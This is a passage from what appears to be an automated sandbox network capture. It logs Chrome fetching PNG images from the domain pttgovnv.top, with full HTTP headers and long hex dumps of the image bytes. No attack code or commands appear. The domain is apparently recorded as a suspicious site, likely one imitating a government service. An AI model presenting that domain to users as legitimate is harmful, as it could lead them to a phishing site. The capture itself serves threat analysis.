          2024-09-01 22:25:25 UTC1369INData Raw: 38 f7 ed 71 10 48 cf f1 22 40 8f c0 be 45 fd db 57 cd 2b ab 03 b7 a7 5e b8 61 49 15 00 be 6b 79 1e ec f4 fd 9e cf 79 55 3e 07 a6 ff 3d d7 53 88 10 c7 3a a9 37 ad a4 3e 58 aa 61 77 b2 8b 70 95 7f 67 e7 17 c1 1c d8 26 f9 f1 22 3f 3e 73 e8 43 1b ea 66 f7 7a 8c 37 a7 07 ec 4f cf ab 3f 7b 97 ff 58 b0 d3 84 cb 74 c3 3c cf 37 b4 33 cd 84 10 c7 53 3d 07 9b 84 b8 8b 1c de 6e 86 f0 47 e5 d5 8b 69 a8 b0 ae e2 ae bc 64 f5 fb f2 29 91 8b fb 5e d8 a1 a1 88 b6 5a ef b3 7c 7e 7e 95 86 7e f3 e7 e2 74 57 23 14 0c 93 39 71 87 7c f0 ef 77 88 f8 b6 ba 1f 22 7d 2c 75 f1 a7 39 69 5f 34 df 77 3c 84 00 97 e6 4b 35 8f d4 1b f2 9f e6 f1 83 00 37 48 ab e6 95 85 de 66 cb a1 2b 72 a3 09 8a 03 dd db d4 6e b9 86 28 7c a4 27 4e 90 4b a1 e7 59 73 62 98 2c 9e 60 87 b4 b7 60 9e ec 9e 4e 6c
          Data Ascii: 8qH"@EW+^aIkyyU>=S:7>Xawpg&"?>sCfz7O?{Xt<73S=nGid)^Z|~~~tW#9q|w"},u9i_4w<K57Hf+rn(|'NKYsb,``Nl
          2024-09-01 22:25:25 UTC1369INData Raw: ec 7e 6c f2 b6 60 fb 9c da 20 c4 09 71 10 5f f0 95 7b 7d 5e e8 ea c0 87 69 b6 26 a8 44 35 77 73 f2 a4 0b b5 e1 42 87 dc bb 00 e5 4d 10 e2 60 23 51 e7 81 5d db 66 eb a3 75 35 f2 9e 05 7e 6f ed 2d c4 0d 78 91 ca c1 fb ed e7 cf 53 80 db 67 af f8 cc 51 10 e2 20 bc e0 17 ba 59 8f ed 30 a9 86 3b ec 16 79 3e dc 3e 03 66 e4 52 31 42 c2 ea 00 b7 ef 73 92 02 cc 42 1c 0c 82 da 70 f7 6a ed b0 13 93 3d 3e f7 89 e3 39 a8 f0 f6 2c 48 80 3b b3 d5 96 10 07 43 11 f5 42 77 61 9b ad fb 0b ca c0 8b c1 d6 b9 b7 b7 57 c1 4b e6 e8 e5 f9 6b 80 4b 9f bf ab 2a c6 a8 c0 d4 11 11 e2 20 bc bc 1a f3 e0 6b c3 35 ed 50 57 b6 64 da 95 d4 ae f3 3d 04 b9 c8 9b dd ab 3d 76 1f dc 8e 9a c7 49 f3 48 37 6b 3f 55 31 a6 33 e8 85 3b 40 9f 6a 02 06 aa 0e fa ba ee 2a 05 7e 3f b6 43 cf 35 f2 76 25 dd
          Data Ascii: ~l` q_{}^i&D5wsBM`#Q]fu5~o-xSgQ Y0;y>>fR1BsBpj=>9,H;CBwaWKkK* k5PWd==vIH7k?U13;@j*~?C5v%
          2024-09-01 22:25:25 UTC361INData Raw: 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 5a 01 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e
          Data Ascii: qqqBBB qqqqBBB qqqqBBB qZ@@@888!!!!@@@888!!!!


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          61192.168.2.449802104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC361OUTGET /help/layout/images/32.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC731INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 68762
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"10c9a-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVyNy%2Fq3NTsGGCw9nA%2Bmmxe0ca6wMipkxbgy7T%2FedSNpmDSsyc7rB9Gh%2BaECvQC3UwjCcelioY7U5vHdO%2B3vs9rjobRg%2B6vVwCmjXpAZ0ONHhyJPmCsfi85W2IllWZs%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad144c4441f9-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC638INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 d0 00 00 03 66 08 06 00 00 00 31 1c e4 c4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
          Data Ascii: PNGIHDRf1tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
          2024-09-01 22:25:25 UTC1369INData Raw: 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 36 41 30 30 36 43 36 42 38 46 45 31 31 45 34 38 38 42 30 39 46 46 46 33 33 34 32 32 45 41 30 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 32 42 39 30 45 34 44 44 42 41 42 37 45 34 31 31 38 37 30 32 44 36 39 34 43 32 44 44 39 42 43 39 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 43 37 31 37 41 39 43 31 34 34 41 44 45 33 31 31 42 33 37 35 42 38 31 45 31 45 45 42 35 42 39 36 22 2f 3e 20 3c 2f 72 64 66 3a 44
          Data Ascii: pMM:InstanceID="xmp.iid:66A006C6B8FE11E488B09FFF33422EA0" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B90E4DDBAB7E4118702D694C2DD9BC9" stRef:documentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96"/> </rdf:D
          2024-09-01 22:25:25 UTC1369INData Raw: 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00 00 00 00 00 00 a0 d6 14 68 00 00 00 00 00 00 00 00 a8 35 05 1a 00 00 00 00 00 00 00 00 6a 4d 81 06 00 00 00 00 00 00 00 80 5a 53 a0 01 00 00
          Data Ascii: jMZSh5jMZSh5jMZSh5jMZSh5jMZSh5jMZS
          2024-09-01 22:25:25 UTC1369INData Raw: db 79 c2 fc e8 3c f3 c4 6a 42 4d be ed 38 f4 60 eb 04 00 00 00 00 ec 13 5b 38 01 b0 4b d7 5f 7f 7d f4 f7 f7 47 47 47 47 7d ee f4 b6 ed b1 f5 a9 af 88 e1 3b 56 ef fa ef 3b 3b a2 f3 b4 13 aa 29 33 a5 34 73 f4 3d 3d 50 f6 52 d9 c6 a9 c5 a6 d0 14 0f ca 7c 23 b3 22 f3 f9 cc 9b 33 b7 39 9a 00 2d f0 8b ee fc 79 d1 55 b6 7d 5a 78 f2 c8 db 8e a3 0e b7 28 61 0b 27 00 00 00 00 b8 3b 26 d0 00 b0 4b 75 2c 58 f6 7f ea 2b bf 5b 9e 99 da 1b 5d f7 3e 2d ba ce bb 57 74 9d bb 30 3a 66 cf f2 e0 d8 9f 13 8e d6 9c 42 f3 c3 a8 b6 6f 7a 7c e6 05 99 63 32 6f c9 5c e1 88 02 34 f9 79 cc 92 e5 31 90 89 4b bf 3f f2 7e 99 48 d3 79 d6 49 d1 75 d6 89 d1 79 e6 49 d1 b9 e0 28 93 e3 00 00 00 00 80 3b 31 81 06 80 5d da b2 65 4b dc 78 e3 8d d1 dd 5d 8f ae e5 f0 d2 3b 62 eb d3 2e 8a e8 1f 88
          Data Ascii: y<jBM8`[8K_}GGGG};V;;)34s==PR|#"39-yU}Zx(a';&Ku,X+[]>-Wt0:fBoz|c2o\4y1K?~HyIuyI(;1]eKx];b.
          2024-09-01 22:25:25 UTC1369INData Raw: 00 00 00 00 30 89 14 68 00 d8 67 53 a6 4c 89 d9 b3 67 c7 fa f5 eb a3 ab ab cb 82 70 e0 27 24 ad 37 85 a6 b8 38 f3 d8 cc 9f 4d e2 6d 98 ba 8b cf 7f 63 66 73 e6 fa cc 65 99 0d 51 4d aa f9 4d 66 99 47 1b 40 f3 19 28 53 68 fe fa 4f 2c 04 00 00 00 00 4c 22 05 1a 00 f6 fd 87 47 77 77 cc 9c 39 33 d6 ae 5d ab 40 c3 98 68 d1 29 34 65 fa cb db 32 f7 cd dc b3 89 6e d7 89 8d b7 67 67 1e 97 19 ca 6c 89 aa 54 f3 a3 a8 b6 7e 5a 14 d5 56 50 65 92 ce e2 b0 05 14 c0 a4 1a 54 a0 01 00 00 00 80 49 d7 31 3c ec b5 12 00 f6 cf 1d 77 dc 11 2b 57 ae 1c d9 d6 09 0e 54 29 cf f4 5d f8 a6 56 bb d9 53 32 2f cb bc ba 45 97 bd 6c f1 54 b6 80 5a 51 be a4 33 a5 c1 74 55 54 65 9b b2 05 d4 46 8f 4c 80 89 31 ed 53 6f 8c 8e 23 ee d1 32 b7 b7 3c 97 50 a6 12 9e 78 e2 89 0e 1e d0 2c ca 2f a6 65
          Data Ascii: 0hgSLgp'$78MmcfseQMMfG@(ShO,L"Gww93]@h)4e2ngglT~ZVPeTI1<w+WT)]VS2/ElTZQ3tUTeFL1So#2<Px,/e
          2024-09-01 22:25:25 UTC1369INData Raw: 01 69 e1 29 34 53 32 17 65 5e 96 31 8e 69 7c 0c 46 55 ac 29 57 e2 5e 17 d5 16 50 a5 64 73 53 e6 27 51 4d b1 d9 5a 1e 46 96 0a 68 ad df d2 3b 62 da 67 de 12 1d 73 67 b7 d6 37 e5 c1 c1 98 31 63 46 1c 73 cc 31 b6 f3 a4 2e 14 68 98 94 5f 91 32 eb 32 5f cf bc 2d aa e9 8c 2b 2c 0b 00 00 c0 d8 50 a0 01 60 5c 5c 7f fd f5 d1 df df af 44 c3 01 69 f1 29 34 47 66 2e ce 9c e7 48 4e b8 52 9e 29 63 ef 6f cf dc 98 b9 22 7e bb 2d d4 ca 30 fe 1e 68 72 bd cf 7b 52 74 3f f6 e1 2d 77 bb cb b9 5f 29 d0 cc 9e 3d db 41 a4 0e 14 68 68 06 e5 5c f7 e3 99 6b 33 df cd ac b7 24 00 00 00 fb 4f 81 06 80 71 b1 76 ed da 58 ba 74 69 74 76 1a be c1 81 69 e1 29 34 45 79 41 a5 3c a1 7d aa 23 39 a9 b6 45 35 fa be 94 67 ca 56 4f 8b 33 5f 8d aa 50 53 ae da 2d 5b 40 29 d5 00 4d a3 f3 ac 93 62 ea
          Data Ascii: i)4S2e^1i|FU)W^PdsS'QMZFh;bgsg71cFs1.h_22_-+,P`\\Di)4Gf.HNR)co"~-0hr{Rt?-w_)=Ahh\k3$OqvXtitvi)4EyA<}#9E5gVO3_PS-[@)Mb
          2024-09-01 22:25:25 UTC1369INData Raw: a3 da 76 f4 53 99 e3 2d 07 00 00 d0 ce 14 68 00 98 bc 1f 42 9d 9d 71 ec b1 c7 2a d1 b0 cf 46 a7 d0 b4 91 32 81 e6 e5 99 3e 47 97 3d e8 88 6a db a7 f2 05 f0 8f 99 ff c8 7c 2b f3 b9 cc 47 32 2f ce dc 3b 33 bf f1 df 02 6d a0 d5 b7 71 2a 36 6e dc 18 fd fd fd 0e 26 40 6b 9a 96 79 62 54 25 ee 67 67 a6 5b 12 00 00 a0 1d 75 94 71 ca 00 30 99 06 06 06 62 f1 e2 c5 23 db 39 95 52 cd c8 0f a8 0e af fb 72 f7 ca 96 16 7d 17 be a9 ad ce cb a2 2a 3f bc 3e 33 11 fb 9a 95 d6 da f9 99 79 99 07 67 4e 6a 84 d6 b7 2c b3 3a f3 e5 cc 8d 99 9f 67 7e 95 d9 68 69 a0 45 75 77 c5 b4 2f fc bf e8 98 d9 ba af 57 96 f2 cc 82 05 0b 62 e6 cc 99 8e 27 ed 62 5e e3 67 ed 7d 2c 05 35 54 26 22 be a9 f1 35 00 00 00 d0 36 14 68 00 68 0a 43 43 43 b1 68 d1 a2 91 32 4d 29 cf f4 f5 f5 c5 ce 3f a3 ba
          Data Ascii: vS-hBq*F2>G=j|+G2/;3mq*6n&@kybT%gg[uq0b#9Rr}*?>3ygNj,:g~hiEuw/Wb'b^g},5T&"56hhCCCh2M)?
          2024-09-01 22:25:25 UTC1369INData Raw: a0 01 80 bd 54 ae 94 de bc 79 f3 8e d2 cc ba 75 eb ee 54 a8 29 3f 53 77 fe b9 6a 5a cd c4 ab c9 14 9a a2 14 52 fe 2e f3 82 a8 ca 28 e3 e5 a7 99 37 67 3e 39 86 ff 66 6f 66 4e e6 fe 8d 2c 6c bc 3d d4 23 b8 6d ad 89 aa 3c f3 f9 a8 b6 7a fa 49 e6 26 cb 02 fb 6f ca 45 cf 8a ae 87 dd bf e5 ef 47 39 6f 9a 37 6f 5e cc 9d 3b d7 41 a5 15 29 d0 c0 be 5b 19 d5 a4 cb 8f 59 8a a6 53 f6 54 2c 4f 76 78 b1 60 fc 75 34 52 94 7d c4 87 2c 49 d3 eb 69 bc 75 ac 26 d6 90 ef 49 00 4c ca c9 9a 02 0d 00 ec bf c1 c1 c1 1d 7f 5e be 7c 79 6c d9 b2 65 47 71 a6 fc b9 94 6e 46 0b 37 5d 5d 5d 16 6c 02 d4 64 0a cd a8 a7 64 2e ca 9c 30 8e 9f e3 86 cc c7 a3 da 3a 6a fb 38 fc fb a5 50 73 66 e6 0f a2 2a 03 9d 9b 29 e3 08 0e f2 68 6e cf 6f 9b 99 1f 65 ca 17 e9 15 99 6f 44 f5 42 ca 36 4b 03 7b
          Data Ascii: TyuT)?SwjZR.(7g>9fofN,l=#m<zI&oEG9o7o^;A)[YST,Ovx`u4R},Iiu&IL^|yleGqnF7]]]ldd.0:j8Psf*)hnoeoDB6K{
          2024-09-01 22:25:25 UTC1369INData Raw: 4e d8 f1 e7 52 ac b9 ed b6 db 76 bc 5f 8a 35 1b 36 6c d8 31 95 a6 bc 20 55 a7 17 a5 6a 3a 85 66 d4 2f 32 ff 18 55 a9 e4 85 31 3e e5 91 f2 6f fe 4d e6 7e 99 57 46 55 dc d9 de 04 f7 bd 8c 80 ff 55 23 c5 eb 33 67 44 35 95 a6 8c c7 3e 26 4c a7 69 75 9d 8d e3 79 52 e3 fd 0b 32 d7 65 fe 3b aa ad 9e 96 37 c9 63 11 c6 d5 e0 0f 7e 1a d1 97 0f f5 29 ad df 0f 2c e7 27 9b 37 6f 8e b5 6b d7 c6 9c 39 73 1c 5c 80 fa 7a 55 54 db b5 be 28 94 a3 01 00 80 09 a6 40 03 00 6d a4 ab ab eb 4e db 3f 95 42 cd 9a 35 6b 76 94 66 36 6d da 34 f2 c2 54 f9 ef 8a 52 ac 69 e7 2d 9f 6a 3c 85 66 d4 1d 51 5d bd b9 38 f3 fc cc a9 e3 f4 79 4a 89 e1 5d 99 93 33 1f 68 7c de 66 b2 b8 91 e2 3f a2 2a cf fc 7e e6 c1 8d db bc 20 aa 2b 5d 69 5d 0b 1b f9 d3 a8 4a 63 df cd 7c 35 aa 6d 9e 6e b3 3c b4 ad
          Data Ascii: NRv_56l1 Uj:f/2U1>oM~WFUU#3gD5>&LiuyR2e;7c~),'7ok9s\zUT(@mN?B5kvf6m4TRi-j<fQ]8yJ]3h|f?*~ +]i]Jc|5mn<
          2024-09-01 22:25:25 UTC1369INData Raw: e4 e1 d5 92 4e 6d e4 71 99 9b 32 1f cb 5c 91 b9 c6 d2 d0 cc 06 2f bf 2a ba 1e b0 b0 6d ee 4f 39 67 d8 b0 61 43 6c db b6 6d a4 a8 0b 00 0d cf 8f aa 94 7f 91 a5 00 00 00 c6 9a 02 0d 00 30 ee a6 4e 9d 3a 92 51 65 3b a8 72 55 79 51 de de 7a eb ad 31 34 34 b4 e3 fd b2 6d c3 68 89 a6 bc 1d 2d de 1c a8 ae b3 4f 19 c9 e0 b5 4a 34 bb 50 ca 2c ff 98 b9 3e f3 b2 18 bf ab 0f cb d5 8d 2f c9 3c 22 f3 8e cc c5 d1 3e 57 db 2d 6b a4 6c 03 74 48 54 25 9a 73 33 7f 95 39 2a aa 12 11 ad a3 5c dd fc 7b 8d 6c 8c ea ca b7 2f 67 be 9d 59 63 79 68 36 83 df 6f af 6d 9c 8a 9e 9e 9e 91 2d 22 cb 44 bb c9 de 0a 12 80 a6 f2 ca cc d6 cc eb 2d 05 00 00 30 96 6c e1 04 00 4c b8 52 88 19 4d d9 96 a1 6c fb 54 b6 80 2a 29 d3 6a 06 07 07 47 4a 36 25 e5 ef b7 6c d9 32 52 ac 19 2d d9 1c c8 8b 68
          Data Ascii: Nmq2\/*mO9gaClm0N:Qe;rUyQz144mh-OJ4P,>/<">W-kltHT%s39*\{l/gYcyh6om-"D-0lLRMlT*)jGJ6%l2R-h


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          62192.168.2.449804172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/37.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 15414
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"3c36-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sx61nL9uzuWjQWwCWbIiosGpFzICKv%2BENJu2oSebwwXU%2BfdK0ajJma8VWjNHSF0J6fAgyL%2F4Dfd58BzHv2d3z2Kpov7OTaTgDOdUdZtV0b1Eta8Ij7DDRKLMxYJeoc%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad14aaf9c3f5-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3b c3 49 44 41 54 78 da ec dd 6d 8c 2b d7 7d df f1 c3 da 90 a5 44 ce 52 b0 62 29 96 93 a5 64 f9 b9 32 79 13 a3 68 d5 3a cb 2d fa a2 70 dd 5e de 06 86 e0 02 c5 72 e3 b8 2f 02 3b 97 d7 05 82 28 49 7b 79 0b 27 36 82 36 97 b7 71 d3 a2 86 7b b9 09 fa 60 38 85 78 51 37 7d d1 22 97 0b 37 ea 8b ba 16 d7 46 24 47 96 2c 6e 12 39 76 22 57 5c 5b b1 6c d5 32 3b 7f ee 7f 76 0f cf ce 90 c3 e1 cc f0 61 be 1f 80 b8 12 c9 1d ce 9c 79 fa cd 39 67 ce 14 86 c3 a1 01 00 00 c0 6a f9 4b 14 01 00 00 00 21
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<;IDATxm+}DRb)d2yh:-p^r/;(I{y'66q{`8xQ7}"7F$G,n9v"W\[l2;vay9gjK!
          2024-09-01 22:25:25 UTC1369INData Raw: 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 00 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 00 00 00 20 c4 01 00 00 80 10 07 00 00 40 88 03 00 00 00 21 0e 00 00 00 84 38 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 80 10 07 00 00 40 88 03 00 00 00 21 0e 00 00
          Data Ascii: q @!Bq8@!Bq8@ B!8@ B!8q B!8q @!8Bq @!
          2024-09-01 22:25:25 UTC1369INData Raw: 13 df 7b e5 0f 99 c2 3d 1f 48 e7 97 a5 56 4e ee 60 ed 7f 22 68 dd 4a f3 ea ca dd c0 a3 4d a7 6d 9d ff a4 fb 02 13 e0 08 71 e9 d0 0d eb 90 92 00 66 26 07 fa 26 c5 10 af ec 74 ec 37 c4 b3 1f 32 a0 b2 84 b8 d3 da b8 d7 bf cf 98 db d2 ab cc 1c 7e f5 e3 c7 37 3d 9c 6d 5e bd aa 41 7d 25 42 b8 d5 74 9a c6 f0 3f 04 38 42 5c ea 6a 63 3b 3e 80 a8 2e 26 35 86 5c 0e 35 bc 20 47 d9 cd ee 86 09 1f 1a 6a e0 5e 58 14 de f8 70 2a cd aa 27 41 4e 6e 7a 90 e6 d5 17 be e4 7e 24 81 a8 6b 96 b8 2f a8 74 89 48 a9 e9 94 00 47 88 cb 8e b7 91 c9 46 5c 35 d4 c8 01 71 34 29 82 58 36 28 bb 99 c3 db 76 e1 c1 83 9a f5 b8 ad 20 52 1b b7 7f f2 7f b7 bf 25 bd 66 55 9f 34 af 7e e1 a1 a0 bb 57 cb 1a e4 96 6a 3c 52 eb ae d3 c7 4c 7a c3 28 11 e0 62 7a 25 45 10 2f c8 69 47 ed ba be 18 1f 0c 49
          Data Ascii: {=HVN`"hJMmqf&&t72~7=m^A}%Bt?8B\jc;>.&5\5 Gj^Xp*'ANnz~$k/tHGF\5q4)X6(v R%fU4~Wj<RLz(bz%E/iGI
          2024-09-01 22:25:25 UTC1369INData Raw: 97 04 b9 5f bc ff 87 09 70 84 38 00 39 0d 70 32 6e 5d 2b e1 c9 12 e2 e6 d3 67 cb 24 c8 05 06 39 79 4c 97 13 e4 7e e5 27 5e 67 3e 59 be 87 00 47 88 03 90 43 6d 93 7c 7f ae 4e 5e 0a 6f f8 68 59 42 70 d2 e3 74 11 e2 96 33 c8 8d 3f 6b f5 dc 9e 29 dc f9 de ec b7 b9 80 20 f7 d3 6f b9 33 a9 20 27 cb d8 60 95 2f 87 57 52 04 00 82 68 0d 9c 04 b8 a4 1f 94 7d e0 5d c5 e7 29 84 34 13 5f 37 c9 3f 01 02 c9 05 39 59 37 a7 43 7b bc e9 97 4d c1 1c 3f 36 2b eb 20 27 bf 6b ee 7a cf 58 90 13 ef 3f 78 76 9e 00 57 cd 53 7f d6 65 47 4d 1c 80 a0 00 57 d5 93 d2 f9 14 26 df ca 4b 39 0e 1f 2d 4b 7b da c5 a4 43 30 5b e8 d2 1a 18 b7 46 ce 0f 72 ab 5f 23 47 80 5b 42 d4 c4 01 b0 c3 9b dc 81 2a 4d 25 5b 29 fd c4 a1 77 12 68 e7 28 c0 75 53 98 74 37 a3 45 68 79 cb 90 f5 09 5b 2e 1c fa de
          Data Ascii: _p89p2n]+g$9yL~'^g>YGCm|N^ohYBpt3?k) o3 '`/WRh}])4_7?9Y7C{M?6+ 'kzX?xvWSeGMW&K9-K{C0[Fr_#G[B*M%[)wh(uSt7Ehy[.
          2024-09-01 22:25:25 UTC1369INData Raw: 9e 93 bb 3d 67 3c 21 54 cd f1 f3 25 e5 b5 99 c2 3c 49 73 cf 23 de ef 5c f3 e6 ad c1 2a 8a 4d 9a 0c db f2 5a f7 ce fa 98 ba bf 5e 8d f2 dd c1 e0 db e6 8e ff f1 a4 f9 fc 5f d9 1c ef 27 77 7f c3 14 5e 7d bf 19 f6 7f 3d 93 7e 72 72 63 45 41 fe 63 3c c8 5d d5 0b ca 3a 6b 95 10 07 20 ee 01 f6 a1 72 d7 1c 77 8e 6e e8 09 a2 9d 52 98 bb 28 fd 78 bc df e3 a0 1d 8d d4 aa 8e fa 78 c9 fa a1 d6 0d 56 3f b8 e8 5e 78 c9 fc f8 fe d3 e6 f7 fe da bd 66 fb 1e ab a7 85 dc f0 f0 83 f7 1f 0f 0b b2 b8 20 e7 d7 26 72 4c 20 c4 01 48 28 d0 95 bc 93 45 d3 a4 f3 e0 f7 1d 6f da 86 20 37 c6 7f a2 80 04 b6 81 06 ea 1e b5 6d 08 30 7e 23 43 54 2f 7f df fc cd ff f9 b4 f9 17 6f bb db 7c f8 81 bb 4e df 97 81 81 7f a2 73 3c 50 6f 06 37 3c 10 e4 08 71 00 b2 09 73 4d 2f 6c 75 63 9f 34 d6 2b c8
          Data Ascii: =g<!T%<Is#\*MZ^_'w^}=~rrcEAc<]:k rwnR(xxV?^xf &rL H(Eo 7m0~#CT/o|Ns<Po7<qsM/luc4+
